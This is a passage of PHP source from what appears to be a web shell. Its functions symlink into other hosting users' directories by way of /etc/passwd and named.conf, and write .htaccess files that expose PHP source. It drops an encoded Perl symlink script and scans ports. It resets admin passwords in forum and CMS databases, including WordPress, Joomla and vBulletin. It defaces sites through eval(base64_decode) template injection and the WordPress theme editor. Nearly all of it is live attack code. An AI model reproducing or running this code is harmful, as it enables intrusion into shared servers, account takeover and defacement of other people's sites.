2521 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2522 continue;
2523 syml($matches,$matches);
2524 }
2525 fclose($file);
2526 unlink("test.txt");
2527 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2528 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2529
2530 }
2531 else
2532 {
2533 $d0mains = @file("/etc/named.conf");
2534 if($d0mains)
2535 {
2536 mkdir("dhanushST");
2537 chdir("dhanushST");
2538 $file3 = 'Options all
2539 DirectoryIndex Sux.html
2540 AddType text/plain .php
2541 AddHandler server-parsed .php
2542 AddType text/plain .html
2543 AddHandler txt .html
2544 Require None
2545 Satisfy Any
2546 ';
2547 $fp3 = fopen('.htaccess','w');
2548 $fw3 = fwrite($fp3,$file3);
2549 @fclose($fp3);
2550 foreach($d0mains as $d0main)
2551 {
2552 if(eregi("zone",$d0main))
2553 {
2554 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2555 flush();
2556
2557 if(strlen(trim($domains[1][0])) > 2)
2558 {
2559 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2560
2561 syml($user['name'],$domains[1][0]);
2562 }
2563 }
2564 }
2565 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2566 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2567 }
2568 else
2569 {
2570 mkdir("dhanushSPT");
2571 chdir("dhanushSPT");
2572 $file3 = 'Options all
2573 DirectoryIndex Sux.html
2574 AddType text/plain .php
2575 AddHandler server-parsed .php
2576 AddType text/plain .html
2577 AddHandler txt .html
2578 Require None
2579 Satisfy Any
2580 ';
2581 $fp3 = fopen('.htaccess','w');
2582 $fw3 = fwrite($fp3,$file3);
2583 @fclose($fp3);
2584 $temp = "";
2585 $val1 = 0;
2586 $val2 = 1000;
2587 for(;$val1 <= $val2;$val1++)
2588 {
2589 $uid = @posix_getpwuid($val1);
2590 if ($uid)
2591 $temp .= join(':',$uid)."\n";
2592 }
2593 echo '<br/>';
2594 $temp = trim($temp);
2595
2596 $file5 = fopen("test.txt","w");
2597 fputs($file5,$temp);
2598 fclose($file5);
2599
2600
2601 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2602 while(!feof($file))
2603 {
2604 $s = fgets($file);
2605 $matches = array();
2606 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2607 $matches = str_replace("home/","",$matches[1]);
2608 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2609 continue;
2610 syml($matches,$matches);
2611 }
2612 fclose($file);
2613 echo "</table>";
2614 unlink("test.txt");
2615 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2616 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2617 }
2618 }
2619 }
2620 else
2621 echo "<center>Cannot Complete the task!!!!</center>";
2622
2623}
2624else if(isset($_GET["perlsymlink"]))
2625{
2626 @mkdir("dhanush",0777);
2627 @chdir("dhanush");
2628 $dhanushsym = gzuncompress(base64_decode($plsym));
2629 $fp3 = fopen('dhanushsym.pl','w');
2630 $fw3 = fwrite($fp3,$dhanushsym);
2631 @fclose($fp3);
2632 chmod("dhanushsym.pl", 0755);
2633 ?><center><iframe src="dhanush/dhanushsym.pl" height="400" width="600"></iframe></center><?php
2634}
2635else if(isset($_GET["symlinkfile"]))
2636{
2637 if(!isset($_GET['file']))
2638 {
2639 ?>
2640 <center>
2641 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
2642 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
2643 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
2644 </form></center>
2645 <br><br>
2646 <?php
2647 }
2648}
2649else if(isset($_GET['symlinkmyfile']))
2650{
2651 if($os == "Linux")
2652 {
2653 $fakedir="cx";
2654 $fakedep=16;
2655
2656 $num=0; // offset of symlink.$num
2657
2658 if(!empty($_GET['myfile']))
2659 $file=$_GET['myfile'];
2660 else $file="";
2661
2662 if(empty($file))
2663 exit;
2664
2665 if(!is_writable("."))
2666 echo "not writable directory";
2667
2668 $level=0;
2669
2670 for($as=0;$as<$fakedep;$as++)
2671 {
2672 if(!file_exists($fakedir))
2673 mkdir($fakedir);
2674 chdir($fakedir);
2675 }
2676
2677 while(1<$as--) chdir("..");
2678
2679 $hardstyle = explode("/", $file);
2680
2681 for($a=0;$a<count($hardstyle);$a++)
2682 {
2683 if(!empty($hardstyle[$a]))
2684 {
2685 if(!file_exists($hardstyle[$a]))
2686 mkdir($hardstyle[$a]);
2687 chdir($hardstyle[$a]);
2688 $as++;
2689 }
2690 }
2691 $as++;
2692 while($as--)
2693 chdir("..");
2694
2695 @rmdir("fakesymlink");
2696 @unlink("fakesymlink");
2697
2698 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
2699
2700 while(1)
2701 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
2702 else $num++;
2703
2704 @unlink("fakesymlink");
2705 mkdir("fakesymlink");
2706
2707 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
2708 }
2709 else
2710 echo '<CENTER>Cannot Create Symlink</CENTER>';
2711}
2712else if(isset($_POST['cpaneluser']))
2713{
2714 if(is_numeric($_POST['noofsubdomain']))
2715 {
2716 for($i=1;$i<=$_POST['noofsubdomain'];$i++)
2717 {
2718 $subDomain = randomt();
2719 echo make_subdomain($subDomain,$_POST['cpaneluser'],$_POST['cpanelpass'],$_POST['subindex']);
2720 }
2721 }
2722 else
2723 echo "Insert number";
2724}
2725else if(isset($_REQUEST['404new']))
2726{
2727 ?>
2728 <form>
2729 <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
2730 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
2731 </br>
2732 </form>
2733 <?php
2734}
2735else if(isset($_REQUEST['404page']))
2736{
2737 $url = $_SERVER['REQUEST_URI'];
2738 $path=explode('/',$url);
2739 $url =str_replace($path[count($path)-1],'',$url);
2740 if(isset($_POST['message']))
2741 {
2742 if($myfile = fopen(".htaccess", "a"))
2743 {
2744 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
2745 if($myfilee = fopen("404.html", "w+"))
2746 {
2747 fwrite($myfilee, $_POST['message']);
2748 }
2749 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
2750 }
2751 else
2752 echo "<center>Cannot Set 404 Page</center>";
2753 }
2754 else if(strlen($ind) != 0)
2755 {
2756 if($myfile = fopen(".htaccess", "a"))
2757 {
2758 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
2759
2760 if($myfilee = fopen("404.html", "w+"))
2761 {
2762 fwrite($myfilee, base64_decode($ind));
2763
2764 fclose($myfilee);
2765 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
2766 }
2767 fclose($myfile);
2768 }
2769 else
2770 {
2771 echo "<center>Cannot Set 404 Page</center>";
2772 }
2773 }
2774 else
2775 echo "<center>Nothing Specified in the shell</center>";
2776}
2777else if(isset($_GET["symlink"]))
2778{
2779 $d0mains = @file("/etc/named.conf");
2780 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2781 $path=explode('/',$url);
2782 $url =str_replace($path[count($path)-1],'',$url);
2783 if($d0mains)
2784 {
2785 @mkdir("dhanush",0777);
2786 @chdir("dhanush");
2787 execmd("ln -s / root");
2788
2789 $file3 = 'Options all
2790 DirectoryIndex Sux.html
2791 AddType text/plain .php
2792 AddHandler server-parsed .php
2793 AddType text/plain .html
2794 AddHandler txt .html
2795 Require None
2796 Satisfy Any
2797 ';
2798 $fp3 = fopen('.htaccess','w');
2799 $fw3 = fwrite($fp3,$file3);
2800 @fclose($fp3);
2801
2802 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
2803
2804 $dcount = 1;
2805 foreach($d0mains as $d0main)
2806 {
2807 if(eregi("zone",$d0main))
2808 {
2809 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2810 flush();
2811
2812 if(strlen(trim($domains[1][0])) > 2)
2813 {
2814 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2815
2816 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
2817 $dcount++;
2818 }
2819 }
2820
2821 }
2822 echo "</table>";
2823 }
2824 else
2825 {
2826 if($os == "Linux")
2827 {
2828 ?>
2829 <div style="float:left;position:fixed;">
2830 <form>
2831 <table cellpadding="9">
2832 <tr>
2833 <th colspan="2">Get User Name</th>
2834 </tr>
2835 <tr>
2836 <td>Enter Website Name :</td>
2837 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
2838 </tr>
2839 <tr>
2840 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
2841 </tr>
2842 <tr>
2843 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
2844 </tr>
2845 </table>
2846 </form>
2847 </div>
2848 <?php
2849 $TEST=@file('/etc/passwd');
2850 if ($TEST)
2851 {
2852 @mkdir("dhanush",0777);
2853 @chdir("dhanush");
2854 execmd("ln -s /root");
2855
2856$file3 = 'Options all
2857 DirectoryIndex Sux.html
2858 AddType text/plain .php
2859 AddHandler server-parsed .php
2860 AddType text/plain .html
2861 AddHandler txt .html
2862 Require None
2863 Satisfy Any
2864 ';
2865 $fp3 = fopen('.htaccess','w');
2866 $fw3 = fwrite($fp3,$file3);
2867 @fclose($fp3);
2868
2869 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
2870
2871
2872 $dcount = 1;
2873 $file = fopen("/etc/passwd", "r");
2874 //Output a line of the file until the end is reached
2875 while(!feof($file))
2876 {
2877 $s = fgets($file);
2878 $matches = array();
2879 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2880 $matches = str_replace("home/","",$matches[1]);
2881 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2882 continue;
2883 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
2884 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2885 $dcount++;
2886 }
2887 fclose($file);
2888
2889 echo "</table>";
2890 }
2891 else
2892 {
2893 @mkdir("dhanush",0777);
2894 @chdir("dhanush");
2895 execmd("ln -s / root");
2896 $file3 = 'Options all
2897 DirectoryIndex Sux.html
2898 AddType text/plain .php
2899 AddHandler server-parsed .php
2900 AddType text/plain .html
2901 AddHandler txt .html
2902 Require None
2903 Satisfy Any
2904 ';
2905 $fp3 = fopen('.htaccess','w');
2906 $fw3 = fwrite($fp3,$file3);
2907 @fclose($fp3);
2908
2909 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
2910
2911 $temp = "";
2912 $val1 = 0;
2913 $val2 = 1000;
2914 for(;$val1 <= $val2;$val1++)
2915 {
2916 $uid = @posix_getpwuid($val1);
2917 if ($uid)
2918 $temp .= join(':',$uid)."\n";
2919 }
2920 echo '<br/>';
2921 $temp = trim($temp);
2922
2923 $file5 = fopen("test.txt","w");
2924 fputs($file5,$temp);
2925 fclose($file5);
2926
2927 $dcount = 1;
2928 $file = fopen("test.txt", "r");
2929 while(!feof($file))
2930 {
2931 $s = fgets($file);
2932 $matches = array();
2933 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2934 $matches = str_replace("home/","",$matches[1]);
2935 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2936 continue;
2937 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
2938 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2939 $dcount++;
2940 }
2941 fclose($file);
2942 echo "</table>";
2943 unlink("test.txt");
2944 }
2945 }
2946 else
2947 echo "<center><font size=4 >Cannot create Symlink</font></center>";
2948 }
2949}
2950else if(isset($_GET['host']) && isset($_GET['protocol']))
2951{
2952 echo "Open Ports: ";
2953 $host = $_GET['host'];
2954 $proto = $_GET['protocol'];
2955 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
2956 for($current = 0; $current <= 23; $current++)
2957 {
2958 $currents = $myports[$current];
2959 $service = getservbyport($currents, $proto);
2960 // Try to connect to port
2961 $result = fsockopen($host, $currents, $errno, $errstr, 1);
2962 // Show results
2963 if($result)
2964 echo "<font class=txt>$currents, </font>";
2965 }
2966}
2967else if(isset($_REQUEST['forumpass']))
2968{
2969 $localhost = $_GET['f1'];
2970 $database = $_GET['f2'];
2971 $username = $_GET['f3'];
2972 $password = $_GET['f4'];
2973 $prefix = $_GET['prefix'];
2974 $newpass = $_GET['newpass'];
2975 $uid = $_GET['uid'];
2976
2977 if($_GET['forums'] == "vb")
2978 {
2979 $newpass = $_GET['newipbpass'];
2980 $uid = $_GET['ipbuid'];
2981 $con = mysql_connect($localhost,$username,$password);
2982 $db = mysql_select_db($database,$con);
2983 $salt = "eghjghrtd";
2984 $newpassword = md5(md5($newpass) . $salt);
2985 if($prefix == "" || $prefix == null)
2986 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
2987 else
2988 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
2989 if($sql)
2990 {
2991 mysql_close($con);
2992 echo "<font class=txt>Password Changed Successfully</font>";
2993 }
2994 else
2995 echo "Cannot Change Password";
2996 }
2997 else if($_GET['forums'] == "mybb")
2998 {
2999 $newpass = $_GET['newipbpass'];
3000 $uid = $_GET['ipbuid'];
3001 $con = mysql_connect($localhost,$username,$password);
3002 $db = mysql_select_db($database,$con);
3003 $salt = "jeghj";
3004 $newpassword = md5(md5($salt).md5($newpass));
3005 if($prefix == "" || $prefix == null)
3006 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
3007 else
3008 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
3009 if($sql)
3010 {
3011 mysql_close($con);
3012 echo "<font class=txt>Password Changed Successfully</font>";
3013 }
3014 else
3015 echo "Cannot Change Password";
3016 }
3017 else if($_GET['forums'] == "smf")
3018 {
3019 $newpass = $_GET['newipbpass'];
3020 $uid = $_GET['ipbuid'];
3021 $con = mysql_connect($localhost,$username,$password);
3022 $db = mysql_select_db($database,$con);
3023
3024 if($prefix == "" || $prefix == null)
3025 {
3026 $result = mysql_query("select member_name from smf_members where id_member = $uid");
3027 $row = mysql_fetch_array($result);
3028 $membername = $row['member_name'];
3029 $newpassword = sha1(strtolower($membername).$newpass);
3030 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
3031 }
3032 else
3033
3034 {
3035 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
3036 $row = mysql_fetch_array($result);
3037 $membername = $row['member_name'];
3038 $newpassword = sha1(strtolower($membername).$newpass);
3039 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
3040 }
3041 if($sql)
3042 {
3043 mysql_close($con);
3044 echo "<font class=txt>Password Changed Successfully</font>";
3045 }
3046 else
3047 echo "Cannot Change Password";
3048 }
3049 else if($_GET['forums'] == "phpbb")
3050 {
3051 $newpass = $_POST['newipbpass'];
3052 $uid = $_POST['ipbuid'];
3053 $con = mysql_connect($localhost,$username,$password);
3054 $db = mysql_select_db($database,$con);
3055
3056 $newpassword = md5($newpass);
3057 if(empty($prefix) || $prefix == null)
3058 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
3059 else
3060 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
3061 if($sql)
3062 {
3063 mysql_close($con);
3064 echo "<font class=txt>Password Changed Successfully</font>";
3065 }
3066 else
3067 echo "Cannot Change Password";
3068 }
3069 else if($_GET['forums'] == "ipb")
3070 {
3071 $newpass = $_POST['newipbpass'];
3072 $uid = $_POST['ipbuid'];
3073 $con = mysql_connect($localhost,$username,$password);
3074 $db = mysql_select_db($database,$con);
3075 $salt = "eghj";
3076 $newpassword = md5(md5($salt).md5($newpass));
3077 if($prefix == "" || $prefix == null)
3078 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
3079 else
3080 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
3081 if($sql)
3082 {
3083 mysql_close($con);
3084 echo "<font class=txt>Password Changed Successfully</font>";
3085 }
3086 else
3087 echo "Cannot Change Password";
3088 }
3089 else if($_GET['forums'] == "wp")
3090 {
3091 $uname = $_GET['uname'];
3092 $con = mysql_connect($localhost,$username,$password);
3093 $db = mysql_select_db($database,$con);
3094
3095 $newpassword = md5($newpass);
3096 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname'");
3097 if($sql)
3098 {
3099 mysql_close($con);
3100 echo "<font class=txt>Password Changed Successfully</font>";
3101 }
3102 else
3103 echo "Cannot Change Password";
3104 }
3105 else if($_GET['forums'] == "joomla")
3106 {
3107 $newjoomlapass = $_GET['newjoomlapass'];
3108 $joomlauname = $_GET['username'];
3109 $con = mysql_connect($localhost,$username,$password);
3110 $db = mysql_select_db($database,$con);
3111
3112 $newpassword = md5($newjoomlapass);
3113 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname'");
3114 if($sql)
3115 {
3116 mysql_close($con);
3117 echo "<font class=txt>Password Changed Successfully</font>";
3118 }
3119 else
3120 echo "Cannot Change Password";
3121 }
3122}
3123else if(isset($_POST['forumdeface']))
3124{
3125 $localhost = $_POST['f1'];
3126 $database = $_POST['f2'];
3127 $username = $_POST['f3'];
3128 $password = $_POST['f4'];
3129 $index = $_POST['index'];
3130 $prefix = $_POST['tableprefix'];
3131
3132 if($_POST['forumdeface'] == "vb")
3133 {
3134 $con =@ mysql_connect($localhost,$username,$password);
3135 $db =@ mysql_select_db($database,$con);
3136 $index=str_replace('"','\\"',$index);
3137 $attack = "{\${eval(base64_decode(\'";
3138 $attack .= base64_encode("echo \"$index\";");
3139 $attack .= "\'))}}{\${exit()}}</textarea>";
3140 if($prefix == "" || $prefix == null)
3141 $query = "UPDATE template SET template = '$attack'";
3142 else
3143 $query = "UPDATE ".$prefix."template SET template = '$attack'";
3144 $result =@ mysql_query($query,$con);
3145 if($result)
3146 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
3147 else
3148 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
3149 }
3150 else if($_POST['forumdeface'] == "mybb")
3151 {
3152 $con =@ mysql_connect($localhost,$username,$password);
3153 $db =@ mysql_select_db($database,$con);
3154 $attack = "{\${eval(base64_decode(\'";
3155 $attack .= base64_encode("echo \"$index\";");
3156 $attack .= "\'))}}{\${exit()}}</textarea>";
3157 $attack = str_replace('"',"\\'",$attack);
3158
3159 if($prefix == "" || $prefix == null)
3160 $query = "UPDATE mybb_templates SET template = '$attack'";
3161 else
3162 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
3163 $result =@ mysql_query($query,$con);
3164 if($result)
3165 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
3166 else
3167 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
3168 }
3169 else if($_POST['forumdeface'] == "smf")
3170 {
3171 $head = $_POST['head'];
3172 $catid = $_POST['f5'];
3173
3174 $con =@ mysql_connect($localhost,$username,$password);
3175 $db =@ mysql_select_db($database,$con);
3176 if($prefix == "" || $prefix == null)
3177 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3178 else
3179 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3180 $result =@ mysql_query($query,$con);
3181 if($result)
3182 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
3183 else
3184 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
3185 }
3186 else if($_POST['forumdeface'] == "ipb")
3187 {
3188 $head = $_POST['head'];
3189 $catid = $_POST['f5'];
3190
3191 $IPB = "forums";
3192 $con =@ mysql_connect($localhost,$username,$password);
3193 $db =@ mysql_select_db($database,$con);
3194 if($prefix == "" || $prefix == null)
3195 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
3196 else
3197 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
3198 if($result)
3199 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
3200 else
3201
3202 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
3203 }
3204 else if($_POST['forumdeface'] == "wp")
3205 {
3206 $site_url = $_POST['siteurl'];
3207 $index = urlencode($index);
3208 $con =@ mysql_connect($localhost,$username,$password);
3209 $db =@ mysql_select_db($database,$con);
3210 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
3211 echo("<br>[+] Changing admin password to 123456789<br>");
3212
3213 if($req1)
3214 {
3215 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
3216 $data = mysql_fetch_array($req);
3217 if(empty($site_url))
3218 $site_url=$data["option_value"];
3219 $output .= "Site : ".$site_url."<br>";
3220
3221 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
3222 $data = mysql_fetch_array($req);
3223 $template = $data["option_value"];
3224
3225 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
3226 $data = mysql_fetch_array($req);
3227 $current_theme = $data["option_value"];
3228
3229 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
3230 $url2=$site_url."/wp-login.php";
3231
3232 $ch = curl_init();
3233 curl_setopt($ch, CURLOPT_URL, $url2);
3234 curl_setopt($ch, CURLOPT_POST, 1);
3235 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
3236 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3237 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3238 curl_setopt($ch, CURLOPT_HEADER, 0);
3239 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
3240 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3241 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3242 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3243 $buffer = curl_exec($ch);
3244
3245 $pos = strpos($buffer,"action=logout");
3246 if($pos === false) {
3247 $output.= "[-] Successful Login<br />";
3248 } else {
3249 $output.= "[+] Successful Login<br />";
3250 }
3251
3252 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
3253 curl_setopt($ch, CURLOPT_URL, $url2);
3254 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
3255 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3256 curl_setopt($ch, CURLOPT_HEADER, 0);
3257 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3258 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3259 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3260 $buffer0 = curl_exec($ch);
3261
3262 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
3263 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
3264
3265 if(substr_count($_file,"index.php") != 0)
3266 {
3267 $url2=$site_url."/wp-admin/theme-editor.php";
3268 curl_setopt($ch, CURLOPT_URL, $url2);
3269 curl_setopt($ch, CURLOPT_POST, 1);
3270 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
3271 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3272 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3273 curl_setopt($ch, CURLOPT_HEADER, 0);
3274 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3275 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3276 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3277 $buffer = curl_exec($ch);
3278 curl_close($ch);
3279
3280 $pos = strpos($buffer,'<div id="message" class="updated">');
3281 $cond = 0;
3282 if($pos === false) {
3283 $output.= "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
3284 } else {
3285 $output.= "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3286 $cond = 1;
3287 }
3288 }
3289 else
3290 {
3291 $url2=$site_url.'/wp-admin/theme-editor.php?file=/themes/'.$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
3292 curl_setopt($ch, CURLOPT_URL, $url2);
3293 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
3294 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3295 curl_setopt($ch, CURLOPT_HEADER, 0);
3296 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3297 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3298 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3299 $buffer0 = curl_exec($ch);
3300
3301 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
3302 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
3303
3304
3305 $url2=$site_url."/wp-admin/theme-editor.php";
3306 curl_setopt($ch, CURLOPT_URL, $url2);
3307 curl_setopt($ch, CURLOPT_POST, 1);
3308 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
3309 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3310 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3311 curl_setopt($ch, CURLOPT_HEADER, 0);
3312 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3313 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3314 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3315 $buffer = curl_exec($ch);
3316 curl_close($ch);
3317
3318 $pos = strpos($buffer,'<div id="message" class="updated">');
3319 $cond = 0;
3320 if($pos === false) {
3321 $output.= "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
3322 } else {
3323 $output.= "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3324 $cond = 1;
3325 }
3326 }
3327 } else {
3328 $output.= "[-] DB Error<br />";
3329 }
3330 echo $output;
3331 global $base_path;
3332 unlink($base_path.'COOKIE.txt');
3333 }
3334 else if($_POST['forumdeface'] == "joomla")
3335 {
3336 $site_url = $_POST['siteurl'];
3337 $dbprefix = $_POST['tableprefix'];
3338 $dbname = $_POST['f2'];
3339 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
3340
3341 $co=randomt();
3342
